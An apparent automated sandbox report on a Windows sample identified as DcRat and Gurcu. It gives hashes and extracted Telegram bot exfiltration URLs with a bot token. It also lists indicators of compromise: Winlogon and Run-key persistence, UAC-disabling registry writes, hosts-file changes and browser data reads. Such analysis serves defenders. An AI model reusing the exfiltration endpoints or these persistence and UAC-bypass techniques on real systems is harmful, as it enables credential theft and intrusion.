Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-11-2024 23:13
Behavioral task
behavioral1
Sample
1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1.exe
Resource
win10v2004-20241007-en
General
-
Target
1.exe
-
Size
2.5MB
-
MD5
a13b59f33063b970d7adbe2a23fb5a81
-
SHA1
7a8f1204af663a38f87816c528e27137f310ae42
-
SHA256
9700e6f8ed338b7ebf337feef5a215a65d061a709a9067218d5ae73093ecb946
-
SHA512
6affe7c79c186e4d466c2f975987af39452d9991453d394efdf93af67c5d8e367ab867625d17ecdb2778c5962c40eea9a207e15c48f9346c58d875b86ce7459f
-
SSDEEP
49152:qbA3q2mzyt2DixLb4I5KKnK5zgdlKWkyT:qbrtzyoWFbvKKnK5Anks
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendPhoto?chat_id=7606992605&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%E2%80%A2%20Comment%3A%20%D1%8E%D1%82%D1%83%D0%B1%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ZTSLLRFH%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5Cbrowserperf%5Csysmon.ex
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A38.392558
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A11.283864
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Gurcu family
-
Modifies WinLogon for persistence 2 TTPs 17 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\sysmon.exe\", \"C:\\Windows\\Help\\en-US\\dwm.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\sysmon.exe\", \"C:\\Windows\\Help\\en-US\\dwm.exe\", \"C:\\Users\\Public\\Videos\\Idle.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\"" BlockDriversession.exe -
Process spawned unexpected child process 51 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2932 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2396 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1852 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2220 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4060 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4584 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2936 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2364 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4796 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1472 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2876 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4500 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4448 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2244 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2552 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4112 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3728 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4004 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2804 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2404 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3636 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1068 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4932 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1292 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3804 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4536 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2568 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4788 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3424 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1492 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1992 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3976 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5012 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1392 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3752 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1736 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2904 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4196 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3236 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1044 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2060 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3404 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 976 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1428 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1612 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 216 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4052 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2716 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3488 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4828 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 64 1432 schtasks.exe 98 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" sysmon.exe -
resource yara_rule behavioral2/files/0x000a000000023ba8-10.dat dcrat behavioral2/memory/1508-13-0x0000000000270000-0x000000000049E000-memory.dmp dcrat behavioral2/files/0x0008000000023c83-102.dat dcrat behavioral2/files/0x000e000000023bb8-122.dat dcrat behavioral2/files/0x0009000000023c0e-159.dat dcrat behavioral2/files/0x000b000000023c16-182.dat dcrat behavioral2/files/0x0014000000023c91-220.dat dcrat behavioral2/files/0x000d000000023c68-257.dat dcrat behavioral2/memory/416-276-0x0000000000110000-0x000000000033E000-memory.dmp dcrat -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts BlockDriversession.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 1.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation BlockDriversession.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation sysmon.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation sysmon.exe -
Executes dropped EXE 11 IoCs
pid Process 1508 BlockDriversession.exe 416 sysmon.exe 1224 sysmon.exe 1408 sysmon.exe 1992 sysmon.exe 632 sysmon.exe 4788 sysmon.exe 1428 sysmon.exe 4296 sysmon.exe 4052 sysmon.exe 2276 sysmon.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 32 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\browserperf\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\browserperf\\dllhost.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\browserperf\\dllhost.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Public\\Videos\\Idle.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Public\\lsass.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\browserperf\\unsecapp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\Help\\en-US\\dwm.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\browserperf\\cmd.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\browserperf\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BlockDriversession = "\"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\browserperf\\csrss.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\browserperf\\upfc.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\Help\\en-US\\dwm.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Public\\Videos\\Idle.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Program Files\\Windows Defender\\en-US\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Users\\Default\\Documents\\SearchApp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Users\\Default\\Documents\\SearchApp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\browserperf\\csrss.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Public\\lsass.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BlockDriversession = "\"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\browserperf\\cmd.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\browserperf\\unsecapp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Program Files\\Windows Defender\\en-US\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\browserperf\\upfc.exe\"" BlockDriversession.exe -
